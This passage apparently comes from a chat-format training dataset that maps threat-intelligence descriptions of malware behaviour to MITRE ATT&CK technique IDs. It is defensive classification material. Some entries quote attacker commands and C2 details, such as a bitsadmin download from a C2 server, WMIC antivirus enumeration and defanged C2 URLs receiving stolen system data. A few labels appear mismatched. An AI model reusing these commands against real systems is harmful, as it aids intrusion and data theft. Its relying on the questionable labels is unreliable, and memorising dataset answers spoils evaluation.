"T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The tool runs the following list of WMI queries: wmic logicaldisk get Caption, Description,VolumeSerialNumber,Size,FreeSpace wmic diskdrive get Model, SerialNumber wmic computersystem get Manufacturer, Model, Name, SystemTypec wmic os get Caption, OSArchitecture, OSLanguage,SystemDrive,MUILanguages wmic process get Caption,ExecutablePath The URL used to send the system information, running processes and a screenshot to the C2 server is: hxxp://145.249.105[.]165/resource-store/stockroom-center-service/check.php?fm=[serial number] The C# variant of Zebrocy uses an HTTP POST request to the URL above to transmit the gathered data, of which is included within the HTTP POST data that is structured as follows: spp=[system information from WMI queries] &spvg=[screenshot in JPEG format] Conclusion The Sofacy group continues their attacks on organizations across the globe using similar tactics and techniques" }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation', 'T1057 - Process Discovery', 'T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can download remote files and additional payloads to the victim's machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has registered itself as a scheduled task to run each time the current user logs in." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bankshot grabs a user token using WTSQueryUserToken and then creates a process by impersonating a logged-on user." }, { "role": "assistant", "content": "T1134.002 - Create Process with Token" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleJeus has placed a plist file within the \"LaunchDaemons\" folder and launched it manually." }, { "role": "assistant", "content": "T1543.004 - Create or Modify System Process: Launch Daemon" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The main CozyCar dropper checks whether the victim has an anti-virus product installed. If the installed product is on a predetermined list, the dropper will exit." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once decrypted, the backdoor takes a fingerprint of the system. It sends home various data, such as the computer and user names and the operating system version, before waiting for commands to carry out its main mission" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A module in collects information from the victim about Windows OS version, computer name, battery info, and physical memory." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses multiple techniques to obfuscate strings, including XOR." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Proton captures the content of the desktop with the screencapture binary." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GALLIUM predominantly uses widely available tools. In certain instances, GALLIUM has modified these tools to add additional functionality. However, it’s likely these modifications have been made to subvert antimalware solutions since much of the malware and tooling employed by GALLIUM is historic and is widely detected by security products. For example, QuarkBandit is a modified version of the widely used Gh0st RAT, an openly available remote access tool (RAT). Similarly, GALLIUM has made use of a modified version of the widely available Poison Ivy RAT. These RATs and the China Chopper web shell form the basis of GALLIUM’s toolkit for maintaining access to a victim network" }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the ability to remove Registry entries that it created during execution." }, { "role": "assistant", "content": "T1070 - Indicator Removal on Host" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The shellcode executed by this command is the same as in the delivery documents as well, specifically taken from Metasploit to obtain additional shellcode to execute using an HTTP request to the following URL: http://www7.chrome-up[.]date/0m5EE We are unsure of the shellcode hosted at this URL, as we were unable to coerce the C2 server to provide a payload" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can enumerate and search for files and directories." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PcShare can upload files and information from a compromised host to its C2 servers." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Egregor has communicated with its C2 servers via HTTPS protocol." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once the macro collected all the information, it sends the data to the C2 server over an HTTP POST request" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Avaddon has searched for specific files prior to encryption." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT38 has used VBScript to execute commands and other operational tasks." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerShower has the ability to encode C2 communications with base64 encoding." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses variations of a simple XOR encryption routine for C&C communications." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MirageFox has the capability to execute commands using cmd.exe." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clop can use cmd.exe to help execute commands on the system." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has downloaded tools to compromised hosts." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PolyglotDuke has has used HTTP GET requests in C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Actors used the ipconfig command to get detailed information about the operating system and hardware and determine if the system was a VMware virtual machine" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cyclops Blink has the ability to upload exfiltrated files to a C2 server." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pony has delayed execution using a built-in function to avoid detection and analysis." }, { "role": "assistant", "content": "T1497.003 - Time Based Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RTM can search for specific strings within browser tabs using a Dynamic Data Exchange mechanism." }, { "role": "assistant", "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ursnif droppers have used COM properties to execute malware in hidden windows." }, { "role": "assistant", "content": "T1564.003 - Hide Artifacts: Hidden Window" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly 2.0 modified the Registry to hide create user accounts." }, { "role": "assistant", "content": "T1564.002 - Hide Artifacts: Hidden Users" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BRONZE BUTLER used spearphishing emails with malicious Microsoft Word attachments to infect victims." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound has used a web shell to exfiltrate a ZIP file containing a dump of LSASS memory on a compromised machine." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This script relays commands and output between the controller and the system" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SOUNDBITE communicates via DNS for C2." }, { "role": "assistant", "content": "T1071.004 - Application Layer Protocol: DNS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BOOTRASH has used unallocated disk space between partitions for a hidden file system that stores components of the Nemesis bootkit." }, { "role": "assistant", "content": "T1564.005 - Hidden File System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It sets keyboard and mouse hooks to its handlekeys() and MouseHookProc() functions respectively and starts several working threads: ID Thread description 1 Gets commands from C2 and saves them to a file and system registry using the bitsadmin.exe utility 2 Decrypts command from registry using RC4 with a hardcoded key, and executes it 3 Transfers screenshots from the clipboard to \\Cache005 subdirectory and Unicode text from clipboard to log.txt, XOR-ed with the “salamati” key (“health” in Farsi) 4 Transfers screenshots to \\Cache005 subdirectory with captureScreenTimeOut and captureScreenTimeOut frequencies 5 Checks network connection, encrypts and sends gathered logs 6 Unhooks mouse and keyboard, removes bitsadmin task 7 Checks if malware’s working directory size already exceeds its threshold 8 Gathers victim´s credentials, visited website cache, decrypted Chrome login data, as well as Firefox databases with cookies, keys, signons and downloads The malware uses the following command to receive data from its C2: bitsadmin.exe /TRANSFER HelpCenterDownload /DOWNLOAD /PRIORITY normal http:///asp.asp?ui=nrg-- Activity logging module (Splitter.exe) This module is called from the main thread to obtain screenshots of windows whose titles are specified in the configuration CaptureSites field, bitmaps and text from clipboard, etc" }, { "role": "assistant", "content": "T1113 - Screen Capture', 'T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pandora can use DLL side-loading to execute malicious payloads." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ThreatNeedle can save its configuration data as the following RC4-encrypted Registry key: `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\GameCon`." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Each web shell instance is configured to contain SP, Key, and Log variables" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a command to retrieve metadata for files on disk as well as a command to list the current working directory." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a command-line interface." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chaes has collected system information, including the machine name and OS version." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Figure 5 shows Phishery’s output to the command that injects a URL into a file named “good_test.docx”, which it will save the resulting file to “bad_test.docx”" }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BloodHound can collect information on user sessions." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TajMahal’ is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins we’ve ever seen for an APT toolset" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Grandoreiro can steal the victim's cookies to use for duplicating the active session from another device." }, { "role": "assistant", "content": "T1539 - Steal Web Session Cookie" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kimsuky has used mshta.exe to run malicious scripts on the system." }, { "role": "assistant", "content": "T1218.005 - Signed Binary Proxy Execution: Mshta" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The .iqy files take advantage of Excel’s willingness to download and include the contents from a remote server in a spreadsheet" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ember Bear has exploited Microsoft Office vulnerability CVE-2017-11882." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Diavol can collect the username from a compromised host." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The domain names differed but the script adheres to the same logic (including the logic function).” The DNSMessenger malware is an obfuscated and customized version of the popular DNS_TXT_PWNAGE.ps1 script available on GitHub and is also referred to by FireEye as POWERSOURCE" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kaspersky Lab detections for Blue, Black, and Green Lamberts have been triggered by a relatively small set of victims from around the world.  While investigating one of these infections involving White Lambert (network-driven implant) and Blue Lambert (active implant), we found yet another family of tools that appear to be related.  We called this new family ‘Pink Lambert’." }, { "role": "assistant", "content": "T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XCSSET uses \"scp\" to access the \"~/Library/Cookies/Cookies.binarycookies\" file." }, { "role": "assistant", "content": "T1539 - Steal Web Session Cookie" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OceanSalt can create a reverse shell on the infected endpoint using cmd.exe. OceanSalt has been executed via malicious macros." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This callback function will call a function named pressedKeyWithKeyCode, which is responsible for logging the keystrokes" }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FlawedGrace creates, encrypts, and stores a configuration file containing the C&C IPs and ports in a “<hex digits>.dat” file (e.g. C:\\ProgramData\\21851a60.dat”). The first 16 bytes of the file are an AES initialization vector (IV). The rest of the data is AES-encrypted in CBC mode" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TEMP.Veles has modified files based on the open-source project cryptcat in an apparent attempt to decrease AV detection rates." }, { "role": "assistant", "content": "T1027.005 - Indicator Removal from Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 likely used COVID-19-themed malicious attachments against Chinese speaking targets." }, { "role": "assistant", "content": "T1598.002 - Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Duqu can track key presses with a keylogger module." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lucifer can clear and remove event logs." }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "POWERTON is written in PowerShell." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT40 strongly favors web shells for maintaining presence, especially publicly available tools" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Action RAT can identify AV products on an infected host using the following command: `cmd.exe WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List`." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "creates folders to store output from batch scripts prior to sending the information to its C2 server." }, { "role": "assistant", "content": "T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Embedded Downloader Trojan The M payload (referenced previously along with the R payload, above) injected and executed within the memory space of the other process is a downloader Trojan. This specific downloader appears to have been created using a VB2Exe tool, as the functional code that carries out the downloading functionality exists as a VBScript embedded within the payload. The payload extracts this VBScript from a resource and saves it to a file that it extracts from another resource. The payload is downloaded from the following location and saved to \"%PUBLIC%\\svchost32.exe" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has registered alternate phone numbers for compromised users to intercept 2FA codes sent via SMS." }, { "role": "assistant", "content": "T1111 - Multi-Factor Authentication Interception" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses AppleScript to create a login item for persistence." }, { "role": "assistant", "content": "T1059.002 - Command and Scripting Interpreter: AppleScript" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Inception has used HTTP, HTTPS, and WebDav in network communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BoomBox can encrypt data using AES prior to exfiltration." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The “upload” command downloads files from the CnC and saves them locally in “C:\\ProgramData“" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has lured victims to execute malware with spearphishing attachments containing macros to download either Emotet, Bokbot, TrickBot, or Bazar." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KONNI has stored collected information and discovered processes in a tmp file." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WannaCry then proceeds to encrypt files on the system, searching for the following file extensions, which are hard-coded in the binary" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sharpshooter's first-stage downloader resolved various Windows libraries and APIs, including LoadLibraryA(), GetProcAddress(), and CreateProcessA()." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Note that the actor used the DLL name wercplsupporte.dll as an attempt to masquerade as the legitimate DLL name, which is wercplsupport.dll (T1036.005: Match Legitimate Name or Location). In addition, more masquerading was used to make malicious Scheduled Tasks blend in with legitimate ones (T1053.005: Scheduled Task" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses DNS TXT records for C2." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After selecting a payload URL, the script will create copies of certutil and regsvr32 to the temp directory for later use" }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dok proxies web traffic to potentially monitor and alter victim HTTP(S) traffic." }, { "role": "assistant", "content": "T1557 - Adversary-in-the-Middle" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Seasalt obfuscates configuration data." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RemoteCMD: This tool executes commands on remote computers, similar to the PsExec tool. Usage is: %s shareIp domain [USER INFORMATION||[USER NAME AND PASSWORD]] [/run:[COMMAND" }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kerrdown can encrypt, encode, and compress multiple layers of shellcode." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Newer variants of BACKSPACE will encode C2 communications with a custom system." }, { "role": "assistant", "content": "T1132.002 - Non-Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For C2 over HTTP, Helminth encodes data with base64 and sends it via the 